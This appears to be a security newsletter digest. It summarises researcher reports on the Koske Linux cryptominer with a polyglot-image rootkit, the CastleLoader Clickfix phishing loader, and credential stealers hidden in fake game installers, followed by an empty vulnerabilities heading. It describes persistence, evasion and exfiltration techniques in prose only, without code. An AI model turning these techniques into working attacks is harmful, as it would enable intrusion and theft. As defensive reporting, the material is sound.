Koske Malware Hides in Panda Images to Deliver In-Memory Rootkits and Cryptominers on Linux
AquaSec researchers have uncovered a sophisticated Linux malware named Koske that embeds executable code within seemingly benign panda-themed JPEG images. The threat actors behind Koske exploit misconfigured, publicly exposed JupyterLab instances to gain remote code execution and deliver two malicious payloads. These payloads are hidden inside polyglot files—crafted to function both as valid images and as shell script or C code—without the use of traditional steganography. When processed by image viewers, the files appear as harmless panda images, but when interpreted by a shell, the hidden code executes in memory. One payload is a compiled-in-memory shared object functioning as a rootkit, utilizing LD_PRELOAD to hook and override system functions such as readdir(), thereby concealing files, processes, and directories related to the malware. The other payload is a shell script that maintains persistence through cron jobs and systemd services, while also modifying system DNS settings, flushing firewall rules, and deploying proxy evasion routines using built-in Linux utilities. After establishing control, the malware evaluates the infected machine’s hardware to determine which cryptominer to deploy for optimal performance across CPU and GPU configurations. The chosen miner is downloaded from GitHub and configured to support at least 18 different cryptocurrencies, including Monero, Ravencoin, Zano, Nexa, and Tari. Koske incorporates failover logic to automatically switch between coins or mining pools, ensuring uninterrupted operation. Its network configuration is hardened to evade detection, locking DNS to Cloudflare and Google resolvers, using the chattr +i flag to prevent modification, and attempting brute-force proxy validation via curl, wget, and raw TCP checks. The rootkit component reads hidden process IDs from /dev/shm/[.]hiddenpid, further complicating detection through user-space monitoring tools. AquaSec analysts believe the malware’s adaptability and automation suggest development through large language models or advanced scripting platforms, raising concerns about the future of AI-assisted, evasive Linux threats.
CastleLoader Malware Uses Clickfix Phishing and Clipboard Hijacking to Deploy Stealers and RATs
CastleLoader is a malware loader campaign active since early 2025, used to distribute a range of information stealers and remote access trojans (RATs). It relies on phishing and drive-by compromise techniques, where victims are lured to Cloudflare-themed “Clickfix” phishing sites that prompt them to paste PowerShell commands into the Run dialog. This social engineering trick executes obfuscated scripts that download ZIP archives containing AutoIT loaders, which inject shellcode and initiate C2 connections over HTTP. The shellcode fetches secondary payloads using the Ingress tool transfer, delivering malware families such as RedLine, StealC, NetSupport RAT, DeerStealer, SectopRAT, or HijackLoader. Fake GitHub repos mimicking SQL Server Management Studio serve as an alternate vector, with executables directly contacting the C2. Over a two-month period, operators utilized seven rotating servers, resulting in nearly 470 successful infections out of 1,634 attempts—a 28.7% success rate, including high-profile U.S. government targets. The malware’s backend infrastructure includes a versioned web-based control panel that resembles a malware-as-a-service offering. Its “installs” module collects system telemetry, while “tasks” and “delivery” sections manage payload distribution, privilege escalation attempts, and region-based targeting. CastleLoader uses obfuscation, DLL hashing, anti-VM logic, and runtime shellcode injection to evade detection. Some payloads are hosted in encrypted Docker containers, complicating static analysis. Shared infrastructure and loader samples link CastleLoader to DeerStealer operations, indicating collaborative or umbrella threat activity. Its evolving techniques and success rate highlight the need for stronger clipboard execution controls, behavioral analytics, and targeted user training to prevent misuse of built-in scripting environments.
Malware Campaign Uses Discord and YouTube to Distribute Game-Themed Credential Stealers
The Acronis Threat Research Unit has exposed a sophisticated credential-harvesting campaign that uses fake indie games promoted through fraudulent websites, Discord channels, and YouTube videos to distribute infostealers. Malware families like Leet Stealer, RMC Stealer, and Sniffer Stealer are hidden within bogus game installers for titles such as Baruda Quest and Warstorm Fire. Attackers exploit stolen branding from real games to enhance legitimacy, luring victims into executing malicious Windows installers hosted on platforms like Discord CDN or Dropbox. These payloads harvest sensitive browser data, Discord tokens, and credentials from applications like Steam, Telegram, WhatsApp, and Epic Games. Variants frequently arrive in password-protected RAR files or display fake installation errors to obscure their intent. Acronis observed that most Windows-based samples are packaged using Electron and Nullsoft installers, embedding malicious JavaScript in app[.]asar files that execute post-install. Technically, the malware executes credential theft through browser debug interfaces and exfiltrates data via external services, such as gofile[.]io. RMC Stealer samples include sandbox evasion tactics that inspect system attributes—such as RAM size, usernames, GPU types, and specific processes —to determine if they’re running in a virtual environment. If detected, the malware halts and displays misleading VBScript errors. Otherwise, it performs comprehensive data theft, zipping credentials and session data for remote upload. Multilingual code comments (in Portuguese, Turkish, and English) and telemetry from Brazil and the U.S. indicate international collaboration and a focus on gaming communities in these regions. Some samples even contained unobfuscated source code, revealing both operational missteps and the modular, evolving nature of the campaign. This activity underscores a growing trend in malware: combining technical stealth with highly targeted social engineering across popular platforms to maximize reach and persistence.
Top Vulnerabilities of the Week
Top CVEs of the Week – As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.
